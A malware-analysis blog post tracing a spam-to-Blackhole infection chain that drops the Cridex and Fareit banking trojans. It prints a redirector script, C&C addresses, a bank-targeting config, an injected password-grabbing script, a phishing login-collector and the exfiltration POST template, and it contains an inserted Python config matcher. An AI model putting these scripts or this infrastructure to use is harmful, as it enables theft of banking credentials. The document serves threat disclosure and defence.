Cridex + Fareit Infection Analysis - "dozakialko.ru:8080" A Credential Stealer Case
18 Jan 2013
#MalwareMustDie!!
[NEW] Fri Jan 18 13:44:56 JST 2013
The new infector domain dfudont.ru:8080 was detected & analyzed -->>[HERE]
PS: dfudont.ru:8080 was also using the same payload (at this moment).

The Background
Yesterday we found a spam infection which led us to URLs like the below:
h00p://www.piastraollare.com/upload.htm
h00p://kompot.designcon.tmweb.ru/upload.htm
We went down to analysis, but had no chance to blog it, and just put a scratch in twitter:

#MalwareMustDie Cridex Infection+all callbacks CnC +PanelPWD in a tweet (pic) cc @nullandnull You got Cridex callbacks twitter.com/MalwareMustDie…
— Malware Crusaders (@MalwareMustDie) January 16, 2013

Today I just read the infection report via spam posted by Conrad of Dynamoo Blog here -->>[Dynamoo], and my heart was called to write down the analysis of the payload details and what that malware actually does, as seen yesterday. People should know exactly what the threat really is. I took the second url to check:

--23:07:05-- h00p://kompot.designcon.tmweb.ru/upload.htm
=> `upload.htm'
Resolving kompot.designcon.tmweb.ru... 176.57.216.3
Connecting to kompot.designcon.tmweb.ru|176.57.216.3|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 423 [text/html]
23:07:06 (14.16 MB/s) - `upload.htm' saved [423/423]

That contains the javascript redirector to the blackhole exploit infector:

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Please wait</title>
</head>
<body>
<h2><b>Please wait a moment ... You will be forwarded. </h2></b>
<h5>Internet Explorer and Mozilla Firefox compatible only</h5><br>
<script>
var1=49;
var2=var1;
if(var1==var2) {document.location="h00p://dozakialko.ru:8080/forum/links/column.php";}
</script>

Accessing the url above, I found the Blackhole landing page, which uses the obfuscation code of PluginDetect 0.7.9. The obfuscation code looks like this (screenshot); after I decoded it, the de-obfuscated script appeared -->>[PASTEBIN]
I followed our own-made guide here -->>[MMD-GUIDE] to grab the exploit components & the payloads served by this infector. The infector details are so identical (and so are the bad actors behind this) that there's no need to describe it all over again. The components contain: 2 (two) PDFs, 2 (two) JARs, 2 (two) SWF exploiters & a payload. Below is the picture of the catches I tweeted, including the infector url & landing page; the payload was detected by 2 (two) AV products only:

#MalwareMustDie - Today's spam leading to h00p://dozakialko.ru:8080/forum/links/column.php (BHEK) infects Cridex/Fareit twitter.com/MalwareMustDie…
— Malware Crusaders (@MalwareMustDie) January 16, 2013

For your convenience you can check the VT detection ratio of each sample below: [infector] [landing-page] [PDF1] [PDF2] [JAR1] [JAR2/0day] [SWF1] [SWF2] [payload]

The Payload
This payload was saved under many names; the one I fetched was info.exe. The name itself was set by the server while the download request was processed, as you'll see in the snipped download logs below:

Resolving dozakialko.ru... seconds 0.00, 212.112.207.15, 89.111.176.125, 91.224.135.20
Caching dozakialko.ru => 212.112.207.15 89.111.176.125 91.224.135.20
Connecting to dozakialko.ru|212.112.207.15|:8080... seconds 0.00, connected.
:
GET /forum/links/column.php?qf=30:1n:1i:1i:33&ye=2v:1k:1m:32:33:1k:1k:31:1j:1o&y=1k&wf=x&xt=t HTTP/1.0
Referer: MalwareMustDie Knocking on your Doors..
Host: dozakialko.ru:8080
HTTP request sent, awaiting response...
:
HTTP/1.1 200 OK
Server: nginx/1.0.10
Date: Wed, 16 Jan 2013 16:28:13 GMT
Content-Type: application/x-msdownload
Connection: keep-alive
X-Powered-By: PHP/5.3.18-1~dotdeb.0
Pragma: public
Expires: Wed, 16 Jan 2013 16:28:14 GMT
Cache-Control: must-revalidate, post-check=0, pre-check=0
Cache-Control: private
Content-Disposition: attachment; filename="info.exe"
Content-Transfer-Encoding: binary
Content-Length: 197632
200 OK
Registered socket 1896 for persistent reuse.
Length: 197,632 (193K) [application/x-msdownload]
01:28:21 (80.99 KB/s) - `info.exe' saved [197632/197632]

The file looks like this:

Sections:
.text 0x1000 0x1e7fc 126976
.rdata 0x20000 0xc578 53248
.data 0x2d000 0x3e80 12288
.rsrc 0x31000 0x1b4 4096
Entry Point...................: 0x2b0e
Virtual Address...............: 0x40370e
Compilation timedatestamp.....: 2012-10-14 00:30:11
Target machine................: 0x14C (Intel 386 or later processors and compatible processors)
Entry point address...........: 0x0000370E
Trace Compiler................: Borland Delphi 3.0
Hexed:
0000 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 MZ..............
0010 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 ........@.......
0020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0030 00 00 00 00 00 00 00 00 00 00 00 00 D8 00 00 00 ................
0040 0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68 ........!..L.!Th
0050 69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F is program canno
0060 74 20 62 65 20 72 75 6E 20 69 6E 20 44 4F 53 20 t be run in DOS
0070 6D 6F 64 65 2E 0D 0D 0A 24 00 00 00 00 00 00 00 mode....$.......
0080 B2 69 F6 96 F6 08 98 C5 F6 08 98 C5 F6 08 98 C5 .i..............
0090 8F 29 9C C5 A5 08 98 C5 C0 2E 93 C5 49 08 98 C5 .)..........I...
00A0 8D 14 94 C5 7B 08 98 C5 F6 08 99 C5 C4 08 98 C5 ....{...........
00B0 78 00 C7 C5 CB 08 98 C5 99 17 9C C5 C3 08 98 C5 x...............
00C0 52 69 63 68 F6 08 98 C5 00 00 00 00 00 00 00 00 Rich............
00D0 00 00 00 00 00 00 00 00 50 45 00 00 4C 01 04 00 ........PE..L...
00E0 93 07 7A 50 00 00 00 00 00 00 00 00 E0 00 03 01 ..zP............

This is Trojan Cridex. It is a plain PE that can be reversed well if you would like to analyze it deeper; it just needs a bit of surgery to remove the trailing chars like below:
0x00F79B bbbb:
0x00F8A7 bbbb:
0x00F8DF bbbb:
0x00F916 bbbb:
0x00F94A bbbb:
0x00F983 bbbb:
0x00F9BD bbbb:
0x00F9ED bbbb:
: :
0x010193 bbbbbbbbbbbbbbBbb
0x0101AE GbbbrcbbRbbbrcbbbbbbbbbbbbb"bb"L
0x0101D6 Obbb"cbbrbbb"cbbbbbbbbbbbbb"bb
0x0101FB bbtpbbb
0x010203 cbbBbbb2cbbbbbbbbbbbbb"bb
0x01023A bb"b3
0x01024E bbbb:

This payload copies itself with the API:
CopyFileW(lpExistingFileName: "%path%\sample.exe",
lpNewFileName: "C:\Documents and Settings\User\Application Data\KB00085031.exe"
, bFailIfExists: 0x0)

and uses "%s" /c "%s" to run via CMD for self-execution, as captured:
%System%CMD.EXE /c %AppData%/KB00085031.exe

The original malware payload file was deleted by the batch commands:
@echo off
del /F /Q /A "%S"
if exist "%S" goto R
del /F /Q /A "%S"

During those processes the below changes occurred in the registry:
HKCU\Software\Microsoft\Windows\CurrentVersion\Run\KB00085031.exe
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings: 3C 00 00 00 0D 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 90 F5 57 C9 7B A4 CD 01 01 00 00 00 C0 A8 07 54 00 00 00 00 00 00 00 00
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings: 3C 00 00 00 36 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 90 F5 57 C9 7B A4 CD 01 01 00 00 00 C0 A8 07 54 00 00 00 00 00 00 00 00

The next thing that happens is that files with the sizes below were dropped in the %Temp% folder:
Path: Size:
C:\Documents and Settings\User\Local Settings\Temp\exp1.tmp 0
C:\Documents and Settings\User\Local Settings\Temp\exp2.tmp 0
C:\Documents and Settings\User\Local Settings\Temp\exp3.tmp 0
C:\Documents and Settings\User\Local Settings\Temp\exp4.tmp.exe 98,304

And then the network activity to the below urls started. One of the captured communications is in the screenshot (click to enlarge); note the usage of the fake USER-AGENT, shown after the list:
h00p://84.22.100.108:8080
h00p://182.237.17.180:8080
h00p://221.143.48.6:8080
h00p://180.235.150.72:8080
h00p://64.76.19.236:8080
h00p://163.23.107.65:8080
h00p://59.90.221.6:8080
h00p://210.56.23.100:8080
h00p://173.201.177.77:8080
h00p://203.217.147.52:8080
h00p://74.207.237.170:8080
h00p://97.74.113.229:8080
h00p://193.68.82.68:8080
h00p://69.64.89.82:8080
h00p://77.58.193.43:8080
h00p://174.120.86.115:8080
h00p://94.20.30.91:8080
h00p://174.142.68.239:8080
h00p://87.229.26.138:8080
h00p://188.120.226.30:8080
h00p://78.28.120.32:8080
h00p://217.65.100.41:8080
h00p://81.93.250.157:8080
h00p://95.142.167.193:8080
h00p://109.230.229.250:8080
h00p://109.230.229.70:8080

Fake USER-AGENT:
Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)

The marked keywords match the reversed result of the binary:
// usage of the HTTP/1.0 and HTTP/1.1 commands handling:
"
GET
POST
HTTP/1.0
HTTP/1.1
multipart/form-data
boundary=
Content-Disposition
name="
filename="
Content-Type
text/
Host
Referer
User-Agent
Authorization
Accept-Encoding
Content-Length
If-Modified-Since
If-None-Match
https
Transfer-Encoding
HTTP/1.1 200 OK
Connection: close
Content-Type: text/html
"

The best part is that the protocol of the data sent in the above network traffic is an encryption of these formats:
// The sent time, user-agent via HTTP
<http time="%%%uu">
<url><![CDATA[%%.%us]]></url>
<useragent><![CDATA[%%.%us]]></useragent>
<data><![CDATA[]]></data>
</http>
// Current time sent with url and data
<httpshot time="%%%uu">
<url><![CDATA[%%.%us]]></url>
<data><![CDATA[]]></data>
</httpshot>
// FTP data...
<ftp time="%%%uu">
<server><![CDATA[%%u.%%u.%%u.%%u:%%u]]></server>
<user><![CDATA[%%.%us]]></user>
<pass><![CDATA[]]></pass>
</ftp>
// Mail POP3 data..
<pop3 time="%%%uu"><server><![CDATA[%%u.%%u.%%u.%%u:%%u]]></server>
<user><![CDATA[%%.%us]]></user><pass><![CDATA[]]></pass>
</pop3>
// Command lines...
<cmd id="%u">%u</cmd>
// Certification information...
<cert time="%u">
<pass><![CDATA[]]></pass>
<data><![CDATA[]]></data>
</cert>
// Internet explorer information
<ie time="%u">
<data><![CDATA[]]></data>
</ie>
// Case of firefox....
<ff time="%u">
<data>
<![CDATA[]]>
</data>
</ff>
// Case of "mm" = Macromedia?
<mm time="%u">
<data><![CDATA[]]></data>
</mm>
// Hashed message contains PC privacy info...
<message set_hash="%%.%us" req_set="%%%%u" req_upd="%%%%u">
<header>
<unique>%%.%us</unique>
<version>%%u</version>
<system>%%u</system>
<network>%%u</network>
</header>
<data>
MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDa1gmnqfz0x8rbd5d78HJCgdSgkQy7k8IISlrVm8zezmXmqtbnNt7Mtk0BZxCq0xnjc+WGc1Zd8XHAkC5smrgFLgZYMhClUOEAfDLQhsnrWyjT5spwnkEgIVOv6oifW7rPPOCGbCYi1vnDiHJdy5AQqLfl4ynb5Pk259NwsjX0wQIDAQAB
</data>
</message>

The data was taken from the below detected software:
Mozilla\Firefox\Profiles
cookies.*
Macromedia
chrome.exe
firefox.exe
explorer.exe

Furthermore, BOTNET commands were also detected, which reminds me of Zbot:
settings
commands
hash
httpshots
formgrabber
redirects
bconnect
httpinjects
modify
pattern
replacement
conditions
actions
redirect
process
:(etc)

Some crypto traces:
CryptImportPublicKeyInfo
CryptDecodeObjectEx
CryptStringToBinaryA
CertDeleteCertificateFromStore
CertDuplicateCertificateContext
CertEnumCertificatesInStore
CertCloseStore
PFXExportCertStoreEx
CertOpenSystemStoreW
PFXImportCertStore

It was all the result of the memory-saved data of KB00085031.exe/Cridex.

Where is "that" Trojan Fareit? What's that?
If we move on, among the dropped files in %Temp% there is a malware called the Fareit trojan:
2013/01/17 02:38 98,304 exp4.tmp.exe
Just before the Cridex process stopped, Fareit was executed (screenshot). By the way, the binary looks like this (screenshot). This is the real deal, what the bad guys really want to implant on our PC: a genuine credential-stealer trojan, backdoor and phishing client. The binary looks like:
MD5: 6cccfd22d1694ce0a4a65c89604d998e
Sections:
.text 0x1000 0x10ae4 69632
.data 0x12000 0x1006c0 4096
.rsrc 0x113000 0x4334 20480
Compilation timedatestamp.....: 2003-09-22 02:08:51
Target machine................: 0x14C (Intel 386 or later processors and compatible processors)
Entry point address...........: 0x00001296
Virtual Address...............: 0x401296
Hex:
0000 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 MZ..............
0010 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 ........@.......
0020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0030 00 00 00 00 00 00 00 00 00 00 00 00 D8 00 00 00 ................
0040 0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68 ........!..L.!Th
0050 69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F is program canno
0060 74 20 62 65 20 72 75 6E 20 69 6E 20 44 4F 53 20 t be run in DOS
0070 6D 6F 64 65 2E 0D 0D 0A 24 00 00 00 00 00 00 00 mode....$.......
0080 3B 3A 67 1A 7F 5B 09 49 7F 5B 09 49 7F 5B 09 49 ;:g..[.I.[.I.[.I
0090 76 23 8D 49 61 5B 09 49 76 23 9C 49 6F 5B 09 49 v#.Ia[.Iv#.Io[.I
00A0 76 23 9A 49 7C 5B 09 49 7F 5B 08 49 29 5B 09 49 v#.I|[.I.[.I)[.I
00B0 76 23 8A 49 1F 5B 09 49 76 23 9B 49 7E 5B 09 49 v#.I.[.Iv#.I~[.I
00C0 76 23 9D 49 7E 5B 09 49 76 23 98 49 7E 5B 09 49 v#.I~[.Iv#.I~[.I
00D0 52 69 63 68 7F 5B 09 49 50 45 00 00 4C 01 03 00 Rich.[.IPE..L...
00E0 B3 59 6E 3F 00 00 00 00 00 00 00 00 E0 00 03 01 .Yn?............
00F0 0B 01 08 00 00 10 01 00 00 10 01 00 00 00 00 00 ................
0100 96 12 00 00 00 10 00 00 00 20 01 00 00 00 40 00 ......... ....@.

Seriously trying to fake itself:
0x01642A MS Shell Dlg
0x016492 &Restart
0x0164BE &Do Not Restart
0x0164E2 Dial-Up Networking Command Line
0x0165DE %2%3%4%5%6
0x0168EA 'entry' alone selects the entry in the phonebook dialog
0x01695C Dial-Up Networking
0x016B2C HDial-Up Networking provides Windows NT's PPP and SLIP protocol support.
0x016BBE XDial-Up Networking is currently uninstalled. Press 'Install' to install and configure.
0x016D02 WYou must shut down and restart your computer before the new settings will take effect.
0x016DB2 *Do you want to restart your computer now?
0x016E08 IYou must be logged on as an Administrator to install Dial-Up Networking.

As a fake Microsoft tool:
0x01701A CompanyName
0x017034 Microsoft Corporation
0x017066 FileDescription
0x017088 Security Configuration Wizard Viewer
0x0170DA FileVersion
0x0170F4 6.0.6001.18000 (longhorn_rtm.080118-1840)
0x01714E InternalName
0x017168 SCWViewer
0x017182 LegalCopyright
0x0171A2 Microsoft Corporation. All rights reserved.
0x017202 OriginalFilename
0x017224 SCWViewer.exe
0x017246 ProductName
0x017286 Operating System
0x0172B2 ProductVersion
0x0172D0 6.0.6001.18000

Some parts that need to be cut before reversing..
0x008E3C 0000000000000000000000000000000000000000
0x009375 "000000000000000000000000000000000000000000000000000000000000000000000000000&
0x0096EF 00000000000000000000000000000000000000000000000000000000000000
0x009D92 ]00000000000000000000000000000000000
0x00A92B <0000000000000000F
0x00B1AE 0000000000000000000000000000000000000000000000000000
0x00B573 L00000000000000000000000000000000000000000000000000000000000000000
0x00B5DA 000000000000000000000000000000000000000000000000000000000000000000000000000000
0x00BE0F 00000000000000000Q
0x00C179 000000000000000000000000000000000000000000000000000000000000000000000A

You'll find the VT report in here --->>[VIRUS-TOTAL]
What this trojan does is firstly download the config file from the CNC and save it into the registry. PoC? Here: the huge data downloaded via HTTP from the remote host (screenshot), with the binary data below (screenshot). This data is saved in the registry as hex-binary (screenshot). If you take the hex and view it in an ASCII viewer, it looks like this (screenshot). This is the so-called Trojan Fareit config; it is made to be executed when the Trojan Fareit is activated in memory, and it is in tagged HTML-like formats. In the following section I will try to explain what's inside this config file.

What was stolen?
That config file explains many things. Below is what was stolen, and how the data is passed:
"cash & wires accounts"
<settings hash="e0014db74a7606d107a0b61e31f0d159334877e8">
<httpshots><url type="deny">\.(css|js)($|\?)</url>
<url contentType="^text/(html|plain)">\.com/k1/</url>
<url contentType="^text/(html|plain)">/ach/</url>
<url contentType="^text/(html|plain)">/authentication/zbf/k/</url>
<url contentType="^text/(html|plain)">/bb/logon/</url>
<url contentType="^text/(html|plain)">chase\.com</url>
<url contentType="^text/(html|plain)">/cashman/</url>
<url contentType="^text/(html|plain)">/cashplus/</url>
: : : :
<url contentType="^text/(html|plain)">achredirect\.aspx</url>
<url contentType="^text/(html|plain)">cbonline</url>
<url contentType="^text/(html|plain)">/ebc_ebc1961/</url>
<url contentType="^text/(html|plain)">/ibs\.</url>
<url contentType="^text/(html|plain)">/ibws/</url>
<url contentType="^text/(html|plain)">/icm/</url>
<url contentType="^text/(html|plain)">/icm2/</url>
<url contentType="^text/(html|plain)">/inets/</url>
<url contentType="^text/(html|plain)">/livewire/</url>
<url contentType="^text/(html|plain)">/loginolb/loginolb</url>
<url contentType="^text/(html|plain)">/netbnx/</url>
<url contentType="^text/(html|plain)">/olbb/</url>
<url contentType="^text/(html|plain)">/phcp</url>
<url contentType="^text/(html|plain)">/sbuser/</url>
<url contentType="^text/(html|plain)">/smallbiz/</url>
<url contentType="^text/(html|plain)">/wcmpw/</url>
<url contentType="^text/(html|plain)">/webcm/</url>
<url contentType="^text/(html|plain)">/wire/</url>
<url contentType="^text/(html|plain)">/wires/</url>
"online bankings..."
<url contentType="^text/(html|plain)">2checkout\・com</url>
<url contentType="^text/(html|plain)">ablv\・com</url>
<url contentType="^text/(html|plain)">access\・jpmorgan\.com</url>
<url contentType="^text/(html|plain)">access\.usbank\・com</url>
<url contentType="^text/(html|plain)">accessbankplc\・com</url>
<url contentType="^text/(html|plain)">accountoverview\.aspx</url>
<url contentType="^text/(html|plain)">accurint\.com</url>
<url contentType="^text/(html|plain)">achieveaccess\・citizensbank\.com</url>
<url contentType="^text/(html|plain)">achpayment</url>
<url contentType="^text/(html|plain)">achweb\.unionbank\.com</url>
<url contentType="^text/(html|plain)">achworks\・com</url>
<url contentType="^text/(html|plain)">alltimetreasury\.pacificcapitalbank\.com</url>
<url contentType="^text/(html|plain)">alphabank\・com</url>
<url contentType="^text/(html|plain)">amegybank\・com/</url>
<url contentType="^text/(html|plain)">anb\.portalvault\・com</url>
<url contentType="^text/(html|plain)">atbonlinebusiness\・com</url>
: : : :
<url contentType="^text/(html|plain)">westfield\.accounts\-in\-view\.com</url>
<url contentType="^text/(html|plain)">wiretransfer</url>
<url contentType="^text/(html|plain)">wtdirect\.com</url>
</httpshots>
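The rule lists in this config have a simple shape: `<url type="deny">` entries are regexes that exclude a request, and the remaining `<url contentType="...">` entries pair a URL regex with a Content-Type regex that the response must match before the page is captured; the formgrabber section further below uses the same `<url>` element as an ordered allow/deny list. As an added example, not code from the original post, here is a Python matcher for that shape, run over a constructed config that reuses a few of the post's own patterns (written with proper regex escaping, since the post defangs some dots with "・") and a constructed set of browser requests. It assumes first-match-wins ordering for the formgrabber list, which is the reading that makes "allow the login page, deny the rest of the domain, allow everything else" meaningful; the post does not state the evaluation order.

```python
import re
import xml.etree.ElementTree as ET

# Constructed sample in the shape of the <settings> config quoted in the post.
# The patterns are a handful of the post's own entries with proper regex
# escaping; the hash value is the one shown on the page.
SAMPLE_CONFIG = r"""<settings hash="e0014db74a7606d107a0b61e31f0d159334877e8">
<httpshots>
<url type="deny">\.(css|js)($|\?)</url>
<url contentType="^text/(html|plain)">chase\.com</url>
<url contentType="^text/(html|plain)">/wires/</url>
<url contentType="^text/(html|plain)">^https://(www\.|)svbconnect\.com/</url>
</httpshots>
<formgrabber>
<url type="deny">\.(swf)($|\?)</url>
<url type="allow">^https?://login\.live\.com/</url>
<url type="deny">^https?://(\w+\.)?live\.com</url>
<url type="allow">.*</url>
</formgrabber>
</settings>"""


class FareitRules:
    """Compiled view of the httpshots and formgrabber rule lists."""

    def __init__(self, xml_text):
        root = ET.fromstring(xml_text)
        self.hash = root.get("hash")
        # httpshots: deny rules screen a request first; a page is then captured
        # when its URL matches a target pattern and its Content-Type matches
        # that pattern's contentType attribute
        self.shot_deny = []
        self.shot_targets = []
        for url in root.find("httpshots"):
            if url.get("type") == "deny":
                self.shot_deny.append(re.compile(url.text))
            else:
                self.shot_targets.append(
                    (re.compile(url.get("contentType", "")), re.compile(url.text)))
        # formgrabber: ordered allow/deny list; first match wins (assumption)
        self.form_rules = [(u.get("type"), re.compile(u.text))
                           for u in root.find("formgrabber")]

    def httpshot_captured(self, url, content_type):
        if any(d.search(url) for d in self.shot_deny):
            return False
        return any(ct.search(content_type) and pat.search(url)
                   for ct, pat in self.shot_targets)

    def form_grabbed(self, url):
        for kind, pat in self.form_rules:
            if pat.search(url):
                return kind == "allow"
        return False


def triage(rules, requests):
    """requests: (url, response Content-Type, request carried form fields).
    Returns (url, channel) pairs that this config would have exfiltrated."""
    hits = []
    for url, content_type, has_form in requests:
        if rules.httpshot_captured(url, content_type):
            hits.append((url, "httpshot"))
        if has_form and rules.form_grabbed(url):
            hits.append((url, "formgrabber"))
    return hits


# Constructed browsing sample: one tuple per request
SAMPLE_REQUESTS = [
    ("https://www.chase.com/wires/app.js", "application/javascript", False),
    ("https://www.chase.com/wires/", "text/html; charset=utf-8", True),
    ("https://login.live.com/login.srf", "text/html", True),
    ("https://mail.live.com/inbox", "text/html", True),
    ("https://example.org/search", "text/html", True),
]

if __name__ == "__main__":
    rules = FareitRules(SAMPLE_CONFIG)
    for url, channel in triage(rules, SAMPLE_REQUESTS):
        print(f"{channel:12s} {url}")
```

Run against a recovered config and a browsing history, this gives an incident responder the concrete list of pages and form posts that were exposed, rather than a bare list of bank names.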
"SNS Accounts.."
<formgrabber>
<url type="deny">\.(swf)($|\?)</url>
<url type="deny">/isapi/ocget.dll</url>
<url type="allow">^https?://aol・com/.*/login/</url>
<url type="allow">^https?://accounts.google・com/ServiceLogin</url>
<url type="allow">^https?://login.yahoo・com/</url>
<url type="allow">^https?://login.live・com/</url>
<url type="deny">^https?://(\w+\.)?aol・com</url>
<url type="deny">^https?://(\w+\.)?facebook・com/</url>
<url type="deny">^https?://(\w+\.)?google</url>
<url type="deny">^https?://(\w+\.)?yahoo</url>
<url type="deny">^https?://(\w+\.)?youtube・com</url>
<url type="deny">^https?://(\w+\.)?live.com</url>
<url type="deny">^https?://(\w+\.)?twitter・com</url>
<url type="deny">^https?://(\w+\.)?vk・com</url>
<url type="allow">.*</url>
</formgrabber>

"Redirecting data to POST.."
<redirect><pattern>jQuatro.js</pattern>
<process><![CDATA[http://62.76.177.123/mx/3A/in/cp.php?h=8]]></process>
</redirect></redirects>
"BOTNET Connection..."
<bconnect>85.143.166.72:443</bconnect>
<httpinjects><httpinject><conditions>

How it was encrypted:
"Encrypt the passwords...."
<replacement><![CDATA[
<script type='text/javascript'>
if(typeof window.EncryptPassword=='function')
{
var fn=window.EncryptPassword;
window.EncryptPassword=function(id)
{
try
{ var e=document・getElementById(id);
var i=document.createElement("input");
i.type="hidden";
i.name="OPN";
i.value=e.value;
document.Form1.appendChild(i);

A complete list of online banking site targets:
<url ...">^https://(www\.|)cashanalyzer\.com/</url>
<url ...">^https://(www\.|)enternetbank\.com/</url>
<url ...">^https://(www\.|)nashvillecitizensbank\.com/</url>
<url ...">^https://.*citizensbank\.com/</url>
<url ...">^https://.+\.firsttennessee\.com/</url>
<url ...">^https://.*firstcitizens\.com/</url>
<url ...">^https://(bolb\-(west|east)|www)\.associatedbank\.com/</url>
<url ...">^https://.*secure\.fundsxpress\.com/</url>
<url ...">^https://usgateway\d*\.rbs\.com/</url>
<url ...">^https://(www\.|)svbconnect\.com/</url>
<url ...">^https?://(www\d*\.|)(ntrs|northerntrust)\.com/</url>
<url ...">^https://cib\.bankofthewest\.com/</url>
<url ...">^https://.+\.unionbank\.com/</url>
<url ...">^https://webbankingforbusiness\.mandtbank\.com/</url>
<url ...">^https://ifxmanager\.bnymellon\.com/</url>
<url ...">^https://(ecash\.|.+/cashman/)</url>
<url ...">^https://banking\.calbanktrust\.com/</url>
<url ...">^https://.+/(wcmfd/wcmpw|phcp/servlet)/</url>
<url ...">^https://(www\.|)efirstbank\.com/</url>
<url ...">^https://singlepoint\.usbank\.com/</url>
<url ...">^https://business-eb\.ibanking-services\.com/</url>
<url ...">^https://www8\.comerica\.com/</url>
<url ...">^https://.+\.53\.com/</url>
<url ...">^https://businessonline\.tdbank\.com/</url>
<url ...">^https://treas-mgt\.frostbank\.com/</url>
<url ...">^https://.+\.huntington\.com/</url>
<url ...">^https://businessaccess\.citibank\.citigroup\.com/</url>
<url ...">^https://.+/cmserver/</url>
<url ...">^https://cashmanager\.mizuhoe-treasurer.com/</url>
<url ...">^https://wellsoffice\.wellsfargo\.com/</url>
<url ...">^https://.+/onlineserv/CM/</url>
<url ...">^https://.+/ebc_ebc1961/</url>
<url ...">^https://(www\.|)sterlingwires\.com/</url>
<url ...">^https://(www\.|)treasury\.pncbank\.com/</url>
<url ...">^https://securentrycorp\.</url>
<url ...">^https://.*ebanking-services\.com/</url>
<url ...">^https://bnycash\.bankofny\.com/</url>
<url ...">^https://(.+\.web\-access|webinfocus\.mandtbank)\.com/</url>
<url ...">^https://.*businessmanager\.com/</url>
<url ...">^https://businessportal\.mibank\.com</url>
<url ...">^https://.+/Common/SignOn/</url>
<url ...">^https://commercial\.wachovia\.com/Online/Financial/Business/</url>
<url ...">^https://.+\.blilk\.com/</url>
<url ...">^https://webcmpr\.bancopopular\.com/K1/</url>
<url ...">^https://trz\.tranzact\.org/</url>
<url ...">^https://.+\.tdcommercialbanking\.com/</url>
<url ...">^https://.+\.ffinonline\.com/</url>
<url ...">^https?://(www\.|)ffbtexas\.com/</url>
<url ...">^https?://.+\.bancosabadellmiami\.com/</url>
<url ...">^https://server\d+\.cey-ebanking\.com/CLKCCM/</url>
<url ...">^https://.+\.ffrontier\.com/</url>
<url ...">^https://.+\.rbsm\.com/</url>
<url ...">^https://.+\.firstmerit</url>
<url ...">^https://.+\.fcsolb\.com</url>
<url ...">^https://cs\.directnet\.com</url>
<url ...">^https://.+\.bankofcyprus\.com/</url>
<url ...">^https://www\.hellenicnetbanking\.com/</url>
<url ...">^https://www\.e\-moneyger\.com/</url>
<url ...">^https://.+\.anzdirect\.co\.nz/online/</url>
<url ...">^https://.+\.anz\.com/inetbank/</url>
<url ...">^https://.+\.bendigobank\.com\.au/</url>
<url ...">^https://ib\.nab\.com\.au/nabib/</url>
<url ...">^https://.+\.nabconnect\.nab\.com\.au/auth/login/</url>
<url ...">^https://.+\.commbiz\.commbank\.com\.au/</url>
<url ...">^https://compassconnect\.compassbank\.com/</url>

Below is the method to redirect into phishing sites...
<replacement> <url contentType="^text/(html|plain)">^h00ps://direct.53・com/</url>
META HTTP-EQUIV="Refresh" CONTENT="0; URL=h00ps://express.53.com/express/logon・jsp

Also aiming at specific urls accessed....
<url ...><![CDATA[^h00ps://online\(.)americanexpress\(.)com/myca/.*?request_type=authreg_acctAccountSummary]]>
<url ...>h00ps://businessaccess\(.)citibank\.citigroup(.)com/cbusol/signon\.do</url>

You can contact me to see the config data extracted.

Phishing
You'll see these phishing codes....
var info = encodeURIComponent('Login='+$('input#EmployerLogin1_cbsys_login_email').
val()+"\n"+'Password='+$('input#EmployerLogin1_cbsys_login_password').
val()+"\n"+$('input[name=q1]').
val()+'='+$('input[name=a1]').
val()+"\n"+$('input[name=q2]').
val()+'='+$('input[name=a2]').
val()+"\n"+$('input[name=q3]').
val()+'='+$('input[name=a3]').

Some trails on the phishing forms.. Related to the phishing form there's code for fake credit card processing (a Luhn checksum over the card number entered):
function check_cc(cardnumber) {
// keep digits only; the kit accepts 15- or 16-digit card numbers
var cardNo = cardnumber.replace(/[^0-9]/g, "");
if (cardNo.length < 15 || cardNo.length > 16) {
return false;
}
var checksum = 0;
var j = 1;
var calc;
var i;
// Luhn: walking from the right, every second digit is doubled and a
// doubled value above 9 has its two digits summed (calc - 10 + 1)
for (i = cardNo.length - 1; i >= 0; i--) {
calc = Number(cardNo.charAt(i)) * j;
if (calc > 9) {
checksum = checksum + 1;
calc = calc - 10;
}
checksum = checksum + calc;
if (j == 1) {
j = 2;
} else {
j = 1;
}
}
// the number is accepted only if the weighted digit sum is a multiple of 10
if (checksum % 10 != 0) {
return false;
}
return true; }

What Software's Credential is Accessed?
Moreover, in memory, trailing paths of credential detection were found:
Common AppData
My Pictures
Common Documents
Common Administrative Tools
Administrative Tools
Personal
Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
explorer.exe
Software\Far\Plugins\FTP\Hosts
Software\Far2\Plugins\FTP\Hosts
Software\Far Manager\Plugins\FTP\Hosts
Software\Far\SavedDialogHistory\FTPHost
Software\Far2\SavedDialogHistory\FTPHost
Software\Far Manager\SavedDialogHistory\FTPHost
Password
HostName
User
:(etc)

With the complete list -->>[PASTEBIN]
You'll see that most of the software that uses the internet with usernames and passwords was aimed at, i.e.: browsers, intranet tools, FTP, plugins, and mailers (POP/SMTP/IMAP).

How Trojan Fareit Sent the Credentials?
How are these credentials sent? In the binary I detected the HTTP POST method coded below:
POST %s HTTP/1.0
Host: %s
Accept: */*
Accept-Encoding: identity, *;q=0
Content-Length: %lu
Connection: close
Content-Type: application/octet-stream
Content-Encoding: binary
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
Content-Length:
Location:
HWID
{%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X}

